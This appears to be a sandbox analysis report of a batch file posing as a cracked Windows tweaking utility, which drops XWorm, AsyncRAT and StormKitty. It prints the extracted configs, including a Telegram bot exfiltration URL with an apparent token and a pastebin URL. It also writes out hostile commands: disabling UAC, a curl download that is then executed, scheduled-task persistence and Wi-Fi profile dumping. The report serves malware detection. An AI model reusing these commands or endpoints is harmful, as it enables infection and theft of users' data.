Analysis
-
max time kernel
238s -
max time network
242s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
05-11-2024 02:02
Static task
static1
Behavioral task
behavioral1
Sample
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
Resource
win11-20241007-en
General
-
Target
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
-
Size
672KB
-
MD5
f9ca73d63fe61c4c401528fb470ce08e
-
SHA1
584f69b507ddf33985673ee612e6099aff760fb1
-
SHA256
16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca
-
SHA512
6fd03320ec84baf09a16a127c2c0ed3c265906fcb1a3b807c13001e775c396b66539238392438a8f290be04b8b8684050736331f8f99dbe8b868b44f154dd9de
-
SSDEEP
3072:BIGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:BIGiVNEn14IZVvisL43
Malware Config
Extracted
xworm
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/ZnhxAV6a
-
telegram
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x001900000002aaef-85.dat family_xworm behavioral1/memory/1492-140-0x0000000000350000-0x000000000037A000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x001900000002aaf2-114.dat family_stormkitty behavioral1/memory/3340-141-0x0000000000FD0000-0x000000000100E000-memory.dmp family_stormkitty -
Stormkitty family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x001900000002aaf2-114.dat family_asyncrat -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe -
Executes dropped EXE 6 IoCs
pid Process 4312 EXMservice.exe 1492 msedge.exe 3340 svchost.exe 4924 msedge.exe 3700 msedge.exe 5604 msedge.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 4488 powershell.exe 2368 powershell.exe 2152 powershell.exe -
Drops desktop.ini file(s) 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\37c09c0bdf67069a6abc7c45578af06e\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\37c09c0bdf67069a6abc7c45578af06e\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\37c09c0bdf67069a6abc7c45578af06e\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\37c09c0bdf67069a6abc7c45578af06e\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\37c09c0bdf67069a6abc7c45578af06e\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\37c09c0bdf67069a6abc7c45578af06e\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\37c09c0bdf67069a6abc7c45578af06e\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\37c09c0bdf67069a6abc7c45578af06e\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 6 pastebin.com 7 pastebin.com 192 drive.google.com 225 drive.google.com 226 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\metadata setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat setup.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x001900000002aadd-474.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1484 cmd.exe 3576 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000485242783223abf50000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000485242780000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090048524278000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d48524278000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000004852427800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier svchost.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133752459094575208" chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2460 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1492 msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4488 powershell.exe 4488 powershell.exe 2152 powershell.exe 2152 powershell.exe 2368 powershell.exe 2368 powershell.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 1492 msedge.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 3340 svchost.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 940 msedge.exe 940 msedge.exe 4508 msedge.exe 4508 msedge.exe 2160 msedge.exe 2160 msedge.exe 1492 msedge.exe 1492 msedge.exe 2192 identity_helper.exe 2192 identity_helper.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
pid Process 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4488 powershell.exe Token: SeIncreaseQuotaPrivilege 884 WMIC.exe Token: SeSecurityPrivilege 884 WMIC.exe Token: SeTakeOwnershipPrivilege 884 WMIC.exe Token: SeLoadDriverPrivilege 884 WMIC.exe Token: SeSystemProfilePrivilege 884 WMIC.exe Token: SeSystemtimePrivilege 884 WMIC.exe Token: SeProfSingleProcessPrivilege 884 WMIC.exe Token: SeIncBasePriorityPrivilege 884 WMIC.exe Token: SeCreatePagefilePrivilege 884 WMIC.exe Token: SeBackupPrivilege 884 WMIC.exe Token: SeRestorePrivilege 884 WMIC.exe Token: SeShutdownPrivilege 884 WMIC.exe Token: SeDebugPrivilege 884 WMIC.exe Token: SeSystemEnvironmentPrivilege 884 WMIC.exe Token: SeRemoteShutdownPrivilege 884 WMIC.exe Token: SeUndockPrivilege 884 WMIC.exe Token: SeManageVolumePrivilege 884 WMIC.exe Token: 33 884 WMIC.exe Token: 34 884 WMIC.exe Token: 35 884 WMIC.exe Token: 36 884 WMIC.exe Token: SeIncreaseQuotaPrivilege 884 WMIC.exe Token: SeSecurityPrivilege 884 WMIC.exe Token: SeTakeOwnershipPrivilege 884 WMIC.exe Token: SeLoadDriverPrivilege 884 WMIC.exe Token: SeSystemProfilePrivilege 884 WMIC.exe Token: SeSystemtimePrivilege 884 WMIC.exe Token: SeProfSingleProcessPrivilege 884 WMIC.exe Token: SeIncBasePriorityPrivilege 884 WMIC.exe Token: SeCreatePagefilePrivilege 884 WMIC.exe Token: SeBackupPrivilege 884 WMIC.exe Token: SeRestorePrivilege 884 WMIC.exe Token: SeShutdownPrivilege 884 WMIC.exe Token: SeDebugPrivilege 884 WMIC.exe Token: SeSystemEnvironmentPrivilege 884 WMIC.exe Token: SeRemoteShutdownPrivilege 884 WMIC.exe Token: SeUndockPrivilege 884 WMIC.exe Token: SeManageVolumePrivilege 884 WMIC.exe Token: 33 884 WMIC.exe Token: 34 884 WMIC.exe Token: 35 884 WMIC.exe Token: 36 884 WMIC.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeBackupPrivilege 4792 vssvc.exe Token: SeRestorePrivilege 4792 vssvc.exe Token: SeAuditPrivilege 4792 vssvc.exe Token: SeBackupPrivilege 3236 srtasks.exe Token: SeRestorePrivilege 3236 srtasks.exe Token: SeSecurityPrivilege 3236 srtasks.exe Token: SeTakeOwnershipPrivilege 3236 srtasks.exe Token: SeBackupPrivilege 3236 srtasks.exe Token: SeRestorePrivilege 3236 srtasks.exe Token: SeSecurityPrivilege 3236 srtasks.exe Token: SeTakeOwnershipPrivilege 3236 srtasks.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeDebugPrivilege 1492 msedge.exe Token: SeDebugPrivilege 3340 svchost.exe Token: SeDebugPrivilege 1492 msedge.exe Token: SeDebugPrivilege 4924 msedge.exe Token: SeDebugPrivilege 3700 msedge.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
pid Process 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4508 msedge.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1492 msedge.exe 5224 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1976 wrote to memory of 1864 1976 cmd.exe 80 PID 1976 wrote to memory of 1864 1976 cmd.exe 80 PID 1976 wrote to memory of 3404 1976 cmd.exe 81 PID 1976 wrote to memory of 3404 1976 cmd.exe 81 PID 1976 wrote to memory of 2944 1976 cmd.exe 82 PID 1976 wrote to memory of 2944 1976 cmd.exe 82 PID 1976 wrote to memory of 4488 1976 cmd.exe 83 PID 1976 wrote to memory of 4488 1976 cmd.exe 83 PID 1976 wrote to memory of 2288 1976 cmd.exe 87 PID 1976 wrote to memory of 2288 1976 cmd.exe 87 PID 1976 wrote to memory of 3776 1976 cmd.exe 88 PID 1976 wrote to memory of 3776 1976 cmd.exe 88 PID 1976 wrote to memory of 636 1976 cmd.exe 89 PID 1976 wrote to memory of 636 1976 cmd.exe 89 PID 636 wrote to memory of 884 636 cmd.exe 90 PID 636 wrote to memory of 884 636 cmd.exe 90 PID 636 wrote to memory of 3208 636 cmd.exe 91 PID 636 wrote to memory of 3208 636 cmd.exe 91 PID 1976 wrote to memory of 1148 1976 cmd.exe 92 PID 1976 wrote to memory of 1148 1976 cmd.exe 92 PID 1976 wrote to memory of 3940 1976 cmd.exe 93 PID 1976 wrote to memory of 3940 1976 cmd.exe 93 PID 1976 wrote to memory of 2152 1976 cmd.exe 94 PID 1976 wrote to memory of 2152 1976 cmd.exe 94 PID 1976 wrote to memory of 3176 1976 cmd.exe 101 PID 1976 wrote to memory of 3176 1976 cmd.exe 101 PID 1976 wrote to memory of 556 1976 cmd.exe 102 PID 1976 wrote to memory of 556 1976 cmd.exe 102 PID 1976 wrote to memory of 3780 1976 cmd.exe 103 PID 1976 wrote to memory of 3780 1976 cmd.exe 103 PID 1976 wrote to memory of 2368 1976 cmd.exe 104 PID 1976 wrote to memory of 2368 1976 cmd.exe 104 PID 1976 wrote to memory of 4312 1976 cmd.exe 105 PID 1976 wrote to memory of 4312 1976 cmd.exe 105 PID 4312 wrote to memory of 1492 4312 EXMservice.exe 106 PID 4312 wrote to memory of 1492 4312 EXMservice.exe 106 PID 4312 wrote to memory of 3340 4312 EXMservice.exe 107 PID 4312 wrote to memory of 3340 4312 EXMservice.exe 107 PID 4312 wrote to memory of 3340 4312 EXMservice.exe 107 PID 1976 wrote to memory of 2080 1976 cmd.exe 108 PID 1976 wrote to memory of 2080 1976 cmd.exe 108 PID 1492 wrote to memory of 2460 1492 msedge.exe 109 PID 1492 wrote to memory of 2460 1492 msedge.exe 109 PID 3340 wrote to memory of 1484 3340 svchost.exe 111 PID 3340 wrote to memory of 1484 3340 svchost.exe 111 PID 3340 wrote to memory of 1484 3340 svchost.exe 111 PID 1484 wrote to memory of 1100 1484 cmd.exe 113 PID 1484 wrote to memory of 1100 1484 cmd.exe 113 PID 1484 wrote to memory of 1100 1484 cmd.exe 113 PID 1484 wrote to memory of 3576 1484 cmd.exe 114 PID 1484 wrote to memory of 3576 1484 cmd.exe 114 PID 1484 wrote to memory of 3576 1484 cmd.exe 114 PID 1484 wrote to memory of 4844 1484 cmd.exe 115 PID 1484 wrote to memory of 4844 1484 cmd.exe 115 PID 1484 wrote to memory of 4844 1484 cmd.exe 115 PID 3340 wrote to memory of 3492 3340 svchost.exe 116 PID 3340 wrote to memory of 3492 3340 svchost.exe 116 PID 3340 wrote to memory of 3492 3340 svchost.exe 116 PID 3492 wrote to memory of 2176 3492 cmd.exe 118 PID 3492 wrote to memory of 2176 3492 cmd.exe 118 PID 3492 wrote to memory of 2176 3492 cmd.exe 118 PID 3492 wrote to memory of 3440 3492 cmd.exe 119 PID 3492 wrote to memory of 3440 3492 cmd.exe 119 PID 3492 wrote to memory of 3440 3492 cmd.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f2⤵PID:1864
-
-
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f2⤵PID:3404
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f2⤵PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Windows\system32\reg.exeReg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f2⤵
- UAC bypass
PID:2288
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f2⤵PID:3776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"2⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_UserAccount where name="Admin" get sid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
C:\Windows\system32\findstr.exefindstr "S-"3⤵PID:3208
-
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:1148
-
-
C:\Windows\system32\chcp.comchcp 4372⤵PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -Command "Checkpoint-Computer -Description 'Exm Premium Restore Point' -RestorePointType 'MODIFY_SETTINGS'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:3176
-
-
C:\Windows\system32\chcp.comchcp 4372⤵PID:556
-
-
C:\Windows\system32\curl.execurl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"2⤵PID:3780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\exm\EXMservice.exeEXMservice.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Users\Admin\msedge.exe"C:\Users\Admin\msedge.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2460
-
-
-
C:\Users\Admin\svchost.exe"C:\Users\Admin\svchost.exe"3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:1100
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3576
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵
- System Location Discovery: System Language Discovery
PID:4844
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
- System Location Discovery: System Language Discovery
PID:2176
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3440
-
-
-
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:2080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://exmtweaks.com/review/fF6DJ2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4508 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc104f3cb8,0x7ffc104f3cc8,0x7ffc104f3cd83⤵PID:3876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,17988060829978018076,6156037173784232907,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:23⤵PID:2728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,17988060829978018076,6156037173784232907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,17988060829978018076,6156037173784232907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:83⤵PID:4852
